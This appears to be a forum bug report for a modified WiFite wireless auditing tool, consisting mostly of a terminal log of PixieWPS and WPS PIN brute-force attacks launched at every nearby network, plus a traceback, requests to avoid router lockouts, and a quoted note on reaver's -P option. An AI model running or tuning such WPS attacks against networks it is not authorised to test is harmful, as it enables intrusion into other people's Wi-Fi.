Just so I can run original and your wifite, I renamed yours wifitemod:
Here's the output with the new version with pixiewps timeout:
Code:
~/wifite-mod-pixiewps-master# ./wifitemod -wps
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
modified by aanarchyy(aanarchyy@gmail.com)
Credits to wiire,DataHead,soxrok2212,nxxxu
[+] targeting WPS-enabled networks
[+] scanning for wireless devices...
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.
[0:00:04] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ------
1 DG167**** 1 WPA2 36db Locked
2 FiOS-S**** 1 WPA2 23db wps
3 SprintGatew**** 1 WPA2 21db wps
[0:00:32] scanning wireless networks. 3 targets and 2 clients found
[+] checking for WPS compatibility... done
[+] removed 47 non-WPS-enabled targets
NUM ESSID CH ENCR POWER WPS? CLIENT
--- -------------------- -- ---- ----- ---- ------
1 DG167**** 1 WPA2 36db Locked
2 TG167**** 11 WPA2 25db wps
3 FiOS-S**** 1 WPA2 24db wps
4 TDS 6 WPA2 22db wps
5 TG167**** 1 WPA2 21db wps
6 MiamiHEAT 11 WPA2 20db wps
7 U10C0**** 1 WPA 18db wps
8 SprintGate**** 1 WPA2 18db wps
9 DIRECT-pm-BR**** 1 WPA2 18db wps
10 DG167**** 1 WPA2 15db wps
[+] select target numbers (1-10) separated by commas, or 'all': all
[+] 10 targets selected.
[0:00:00] initializing PixieWPS attack on DG167**** (...........:73:90)
[+] E-Nonce found
[+] PKE hash found
[+] PKR hash found
[!] unable to complete successful try in 60 seconds
[+] skipping pixiewps on DG167****
[+] Pixiewps attack failed!
[0:00:00] initializing WPS PIN attack on DG167**** (...........:73:90)
^C0:00:18] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[+] 9 targets remain
[+] what do you want to do?
[c]ontinue attacking targets
[e]xit completely
[+] please make a selection (c, or e): c
[0:00:00] initializing PixieWPS attack on TG167**** (...........:EC:10)
[!] unable to complete successful try in 60 seconds
[+] skipping pixiewps on TG167****
[+] Pixiewps attack failed!
[0:00:00] initializing WPS PIN attack on TG167**** (...........:EC:10)
^C0:00:22] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[+] 8 targets remain
[+] what do you want to do?
[c]ontinue attacking targets
[e]xit completely
[+] please make a selection (c, or e): c
[0:00:00] initializing PixieWPS attack on FiOS-S**** (...........:EC:C2)
[+] E-Nonce found
[+] PKE hash found
[+] PKR hash found
[+] E-Hash1 found
[+] E-Hash2 found
Traceback (most recent call last):
File "./wifitemod", line 3124, in <module>
main()
File "./wifitemod", line 321, in main
need_handshake = not wps_attack(iface, t)
File "./wifitemod", line 2912, in wps_attack
line = f.readline()
UnboundLocalError: local variable 'f' referenced before assignment
Timeout for pixie worked, but there is another error above.
Please make the pixie timeout configurable.
Also an option: if pixiewps fails, no brute force, move to the next target.
Please consider, because a failed attempt locked the router.
Code:
For those wondering what reaver's -P option is intended for:
Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
This option was made with intent of:
----Collecting repetitive hashes for further comparison and/or analysis / discovery of new vulnerable chipsets, routers, etc.
----Time-sensitive attacks where the hash collecting continues repetitively until your time frame is met.
----For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.
by datahead